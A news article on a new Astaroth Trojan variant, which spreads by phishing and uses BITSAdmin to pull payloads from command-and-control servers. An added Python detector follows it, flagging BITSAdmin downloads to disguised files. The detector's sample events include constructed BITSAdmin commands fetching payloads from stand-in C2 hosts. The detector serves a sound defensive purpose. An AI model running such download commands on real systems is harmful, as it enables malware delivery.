A new strain of the Astaroth Trojan has been given the capability to exploit vulnerable processes in antivirus software and services.

Cybereason’s Nocturnus Research team said in a blog post published on Wednesday that the variant is able to use modules in cybersecurity software to steal online credentials and personal data.

In its latest form, Astaroth is being used in spam campaigns across Brazil and Europe, with thousands of infections recorded at the end of 2018. The malware spreads through .7zip file attachments and malicious links. The cybersecurity researchers said the Trojan masquerades as a JPEG, .GIF, or an extensionless file to avoid detection when executed on a machine.

If a spam email or phishing message proves successful and the file is downloaded and opened, the legitimate Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

After initializing, the malware launches an XSL script which establishes a channel with the C2 server. The script, which is obfuscated, contains functions to hide itself from antivirus software and is responsible for the process which leverages BITSAdmin to download payloads, including Astaroth, from a separate C2 server.

Past…
ZDNet is a business technology news website published by CBS Interactive, along with TechRepublic. The brand was founded on April 1, 1991, as a general interest technology portal from Ziff Davis and evolved into an enterprise IT-focused online publication owned by CNET Networks.
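The BITSAdmin download step and the image or extensionless disguise described in the article can be hunted for in process-creation logs. The sketch below is an added example, not code from ZDNet or Cybereason. The sample command lines, hostnames and paths are constructed, and treating `/transfer` and `/addfile` as the download switches is an assumption, since the article does not say which one the malware uses.

```python
import re
from pathlib import PureWindowsPath

DOWNLOAD_SWITCHES = {"/transfer", "/addfile"}       # assumed: switches that take a remote URL
URL_RE = re.compile(r"https?://\S+", re.I)
DISGUISE_SUFFIXES = {".jpg", ".jpeg", ".gif", ""}   # "" means extensionless

# Constructed sample process-creation command lines (not taken from the report).
SAMPLE_EVENTS = [
    r'bitsadmin.exe /transfer upd /download /priority foreground http://c2.example.invalid/a.jpg C:\Users\Public\a.jpg',
    r'"C:\Windows\System32\bitsadmin.exe" /transfer j https://cdn.example.invalid/setup.msi C:\Temp\setup.msi',
    r'bitsadmin /transfer x http://c2.example.invalid/p C:\Users\Public\Libraries\p',
    r'bitsadmin /list /allusers',
    r'notepad.exe C:\Users\Public\holiday.gif',
]

def tokenize(cmdline):
    """Split a command line on whitespace, keeping double-quoted strings whole."""
    return [q if q else w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def assess(cmdline):
    """Return the reasons a command line is flagged; an empty list means no match."""
    tokens = tokenize(cmdline)
    if not tokens or PureWindowsPath(tokens[0]).stem.lower() != "bitsadmin":
        return []
    args = tokens[1:]
    if not any(a.lower() in DOWNLOAD_SWITCHES for a in args):
        return []
    reasons = []
    for i, arg in enumerate(args):
        if not URL_RE.fullmatch(arg):
            continue
        if not reasons:
            reasons.append("bitsadmin download from remote URL")
        # bitsadmin takes the local destination as the argument after the URL
        dest = args[i + 1] if i + 1 < len(args) else None
        if dest and PureWindowsPath(dest).suffix.lower() in DISGUISE_SUFFIXES:
            reasons.append("destination is image-named or extensionless: " + dest)
    return reasons

def scan(events):
    """Return (command line, reasons) pairs for the flagged events only."""
    return [(e, r) for e in events if (r := assess(e))]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(event, "->", "; ".join(reasons))
```

A download to an ordinary installer path raises only the first reason, so the second reason is the one that separates the disguise pattern from routine administrative use of BITSAdmin.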